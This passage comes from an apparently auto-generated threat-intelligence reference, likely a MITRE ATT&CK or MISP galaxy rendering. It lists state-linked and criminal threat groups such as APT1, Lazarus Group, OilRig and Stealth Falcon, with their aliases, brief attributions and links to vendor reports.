<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon%202014%20R&amp;D%20Track%20Insight%20into%20Symbiotic%20APT.pdf">https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon%202014%20R&amp;D%20Track%20Insight%20into%20Symbiotic%20APT.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt1"><a class="anchor" href="#_apt1"></a><a class="link" href="#_apt1">APT1</a></h3>
<div class="paragraph">
<p>APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the Peoples Liberation Army (PLA) General Staff Departments (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398.[[Citation: Mandiant APT1]]</p>
</div>
<div class="paragraph">
<p>APT1 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT1</p>
</li>
<li>
<p>Comment Crew</p>
</li>
<li>
<p>Comment Group</p>
</li>
<li>
<p>Comment Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1178. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0006">https://attack.mitre.org/wiki/Group/G0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taidoor"><a class="anchor" href="#_taidoor"></a><a class="link" href="#_taidoor">Taidoor</a></h3>
<div class="paragraph">
<p>Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government.[[Citation: TrendMicro Taidoor]]</p>
</div>
<div class="paragraph">
<p>Taidoor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Taidoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1179. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0015">https://attack.mitre.org/wiki/Group/G0015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_night_dragon"><a class="anchor" href="#_night_dragon"></a><a class="link" href="#_night_dragon">Night Dragon</a></h3>
<div class="paragraph">
<p>Night Dragon is a threat group that has conducted activity originating primarily in China.[[Citation: McAfee Night Dragon]]</p>
</div>
<div class="paragraph">
<p>Night Dragon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Night Dragon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1180. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0014">https://attack.mitre.org/wiki/Group/G0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf">http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_naikon"><a class="anchor" href="#_naikon"></a><a class="link" href="#_naikon">Naikon</a></h3>
<div class="paragraph">
<p>Naikon is a threat group that has focused on targets around the South China Sea.Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.[[Citation: Baumgartner Golovkin Naikon 2015]]</p>
</div>
<div class="paragraph">
<p>Naikon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Naikon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1181. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0019">https://attack.mitre.org/wiki/Group/G0019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn2.hubspot.net/hubfs/454298/Project%20CAMERASHY%20ThreatConnect%20Copyright%202015.pdf">http://cdn2.hubspot.net/hubfs/454298/Project%20CAMERASHY%20ThreatConnect%20Copyright%202015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ke3chang"><a class="anchor" href="#_ke3chang"></a><a class="link" href="#_ke3chang">Ke3chang</a></h3>
<div class="paragraph">
<p>Ke3chang is a threat group attributed to actors operating out of China.[[Citation: Villeneuve et al 2014]]</p>
</div>
<div class="paragraph">
<p>Ke3chang is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ke3chang</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1182. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0004">https://attack.mitre.org/wiki/Group/G0004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_patchwork"><a class="anchor" href="#_patchwork"></a><a class="link" href="#_patchwork">Patchwork</a></h3>
<div class="paragraph">
<p>Patchwork is a threat group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Much of the code used by this group was copied and pasted from online forums.[[Citation: Cymmetria Patchwork]][[Citation: Symantec Patchwork]]</p>
</div>
<div class="paragraph">
<p>Patchwork is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Patchwork</p>
</li>
<li>
<p>Dropping Elephant</p>
</li>
<li>
<p>Chinastrats</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1183. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0040">https://attack.mitre.org/wiki/Group/G0040</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling%20Patchwork.pdf">https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling%20Patchwork.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries">http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt30"><a class="anchor" href="#_apt30"></a><a class="link" href="#_apt30">APT30</a></h3>
<div class="paragraph">
<p>APT30 is a threat group suspected to be associated with the Chinese government.Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.[[Citation: Baumgartner Golovkin Naikon 2015]]</p>
</div>
<div class="paragraph">
<p>APT30 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT30</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1184. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0013">https://attack.mitre.org/wiki/Group/G0013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_monsoon"><a class="anchor" href="#_monsoon"></a><a class="link" href="#_monsoon">MONSOON</a></h3>
<div class="paragraph">
<p>MONSOON is the name of an espionage campaign that apparently started in December 2015 and was ongoing as of July 2016. It is believed that the actors behind MONSOON are the same actors behind Operation Hangover. While attribution is unclear, the campaign has targeted victims with military and political interests in the Indian Subcontinent.[[Citation: Forcepoint Monsoon]] Operation Hangover has been reported as being Indian in origin, and can be traced back to 2010.[[Citation: Operation Hangover May 2013]]</p>
</div>
<div class="paragraph">
<p>MONSOON is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MONSOON</p>
</li>
<li>
<p>Operation Hangover</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1185. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0042">https://attack.mitre.org/wiki/Group/G0042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling%20an%20Indian%20Cyberattack%20Infrastructure.pdf">http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling%20an%20Indian%20Cyberattack%20Infrastructure.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt17"><a class="anchor" href="#_apt17"></a><a class="link" href="#_apt17">APT17</a></h3>
<div class="paragraph">
<p>APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.[[Citation: FireEye APT17]]</p>
</div>
<div class="paragraph">
<p>APT17 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT17</p>
</li>
<li>
<p>Deputy Dog</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1186. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0025">https://attack.mitre.org/wiki/Group/G0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf">https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin7"><a class="anchor" href="#_fin7"></a><a class="link" href="#_fin7">FIN7</a></h3>
<div class="paragraph">
<p>FIN7 is a financially motivated threat group that has primarily targeted the retail and hospitality sectors, often using point-of-sale malware. It is sometimes referred to as Carbanak Group, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately.[[Citation: FireEye FIN7 March 2017]][[Citation: FireEye FIN7 April 2017]]</p>
</div>
<div class="paragraph">
<p>FIN7 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN7</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1187. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0046">https://attack.mitre.org/wiki/Group/G0046</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt3"><a class="anchor" href="#_apt3"></a><a class="link" href="#_apt3">APT3</a></h3>
<div class="paragraph">
<p>APT3 is a China-based threat group that researchers have attributed to China&#8217;s Ministry of State Security.[[Citation: FireEye Clandestine Wolf]][[Citation: Recorded Future APT3 May 2017]] This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.[[Citation: FireEye Clandestine Wolf]][[Citation: FireEye Operation Double Tap]] As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.[[Citation: Symantec Buckeye]]</p>
</div>
<div class="paragraph">
<p>APT3 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT3</p>
</li>
<li>
<p>Gothic Panda</p>
</li>
<li>
<p>Pirpi</p>
</li>
<li>
<p>UPS Team</p>
</li>
<li>
<p>Buckeye</p>
</li>
<li>
<p>Threat Group-0110</p>
</li>
<li>
<p>TG-0110</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1188. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0022">https://attack.mitre.org/wiki/Group/G0022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.recordedfuture.com/chinese-mss-behind-apt3/">https://www.recordedfuture.com/chinese-mss-behind-apt3/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/11/operation%20doubletap.html">https://www.fireeye.com/blog/threat-research/2014/11/operation%20doubletap.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gcman"><a class="anchor" href="#_gcman"></a><a class="link" href="#_gcman">GCMAN</a></h3>
<div class="paragraph">
<p>GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.[[Citation: Securelist GCMAN]]</p>
</div>
<div class="paragraph">
<p>GCMAN is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GCMAN</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1189. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0036">https://attack.mitre.org/wiki/Group/G0036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/73638/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/">https://securelist.com/blog/research/73638/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lazarus_group"><a class="anchor" href="#_lazarus_group"></a><a class="link" href="#_lazarus_group">Lazarus Group</a></h3>
<div class="paragraph">
<p>Lazarus Group is a threat group that has been attributed to the North Korean government.Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[[Citation: Novetta Blockbuster]]</p>
</div>
<div class="paragraph">
<p>Lazarus Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lazarus Group</p>
</li>
<li>
<p>HIDDEN COBRA</p>
</li>
<li>
<p>Guardians of Peace</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1190. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0032">https://attack.mitre.org/wiki/Group/G0032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf">https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-164A">https://www.us-cert.gov/ncas/alerts/TA17-164A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lotus_blossom"><a class="anchor" href="#_lotus_blossom"></a><a class="link" href="#_lotus_blossom">Lotus Blossom</a></h3>
<div class="paragraph">
<p>Lotus Blossom is threat group that has targeted government and military organizations in Southeast Asia.[[Citation: Lotus Blossom Jun 2015]] It is also known as Spring Dragon.[[Citation: Spring Dragon Jun 2015]]</p>
</div>
<div class="paragraph">
<p>Lotus Blossom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lotus Blossom</p>
</li>
<li>
<p>Spring Dragon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1191. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0030">https://attack.mitre.org/wiki/Group/G0030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html">https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/70726/the-spring-dragon-apt/">https://securelist.com/blog/research/70726/the-spring-dragon-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_equation"><a class="anchor" href="#_equation"></a><a class="link" href="#_equation">Equation</a></h3>
<div class="paragraph">
<p>Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives.[[Citation: Kaspersky Equation QA]]</p>
</div>
<div class="paragraph">
<p>Equation is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Equation</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1192. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0020">https://attack.mitre.org/wiki/Group/G0020</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Equation%20group%20questions%20and%20answers.pdf">https://securelist.com/files/2015/02/Equation%20group%20questions%20and%20answers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkhotel"><a class="anchor" href="#_darkhotel"></a><a class="link" href="#_darkhotel">Darkhotel</a></h3>
<div class="paragraph">
<p>Darkhotel is a threat group that has been active since at least 2004. The group has conducted activity on hotel and business center WiFi and physical connections as well as peer-to-peer and file sharing networks. The actors have also conducted spearphishing.[[Citation: Kaspersky Darkhotel]]</p>
</div>
<div class="paragraph">
<p>Darkhotel is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Darkhotel</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1193. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0012">https://attack.mitre.org/wiki/Group/G0012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2014/11/darkhotel%20kl%2007.11.pdf">https://securelist.com/files/2014/11/darkhotel%20kl%2007.11.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oilrig"><a class="anchor" href="#_oilrig"></a><a class="link" href="#_oilrig">OilRig</a></h3>
<div class="paragraph">
<p>OilRig is a threat group with suspected Iranian origins that has targeted Middle Eastern victims since at least 2015.[[Citation: Palo Alto OilRig April 2017]][[Citation: ClearSky OilRig Jan 2017]][[Citation: Palo Alto OilRig May 2016]][[Citation: Palo Alto OilRig Oct 2016]]</p>
</div>
<div class="paragraph">
<p>OilRig is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OilRig</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1194. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0049">https://attack.mitre.org/wiki/Group/G0049</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/">http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/oilrig/">http://www.clearskysec.com/oilrig/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dragonfly"><a class="anchor" href="#_dragonfly"></a><a class="link" href="#_dragonfly">Dragonfly</a></h3>
<div class="paragraph">
<p>Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems.[[Citation: Symantec Dragonfly]]</p>
</div>
<div class="paragraph">
<p>Dragonfly is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dragonfly</p>
</li>
<li>
<p>Energetic Bear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1195. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0035">https://attack.mitre.org/wiki/Group/G0035</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_suckfly"><a class="anchor" href="#_suckfly"></a><a class="link" href="#_suckfly">Suckfly</a></h3>
<div class="paragraph">
<p>Suckfly is a China-based threat group that has been active since at least 2014.[[Citation: Symantec Suckfly March 2016]]</p>
</div>
<div class="paragraph">
<p>Suckfly is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Suckfly</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1196. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0039">https://attack.mitre.org/wiki/Group/G0039</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stealth_falcon"><a class="anchor" href="#_stealth_falcon"></a><a class="link" href="#_stealth_falcon">Stealth Falcon</a></h3>
<div class="paragraph">
<p>Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed.[[Citation: Citizen Lab Stealth Falcon May 2016]]</p>
</div>
<div class="paragraph">
<p>Stealth Falcon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Stealth Falcon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1197. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0038">https://attack.mitre.org/wiki/Group/G0038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/05/stealth-falcon/">https://citizenlab.org/2016/05/stealth-falcon/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic"><a class="anchor" href="#_scarlet_mimic"></a><a class="link" href="#_scarlet_mimic">Scarlet Mimic</a></h3>
<div class="paragraph">
<p>Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group&#8217;s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same.[[Citation: Scarlet Mimic Jan 2016]]</p>
</div>
<div class="paragraph">
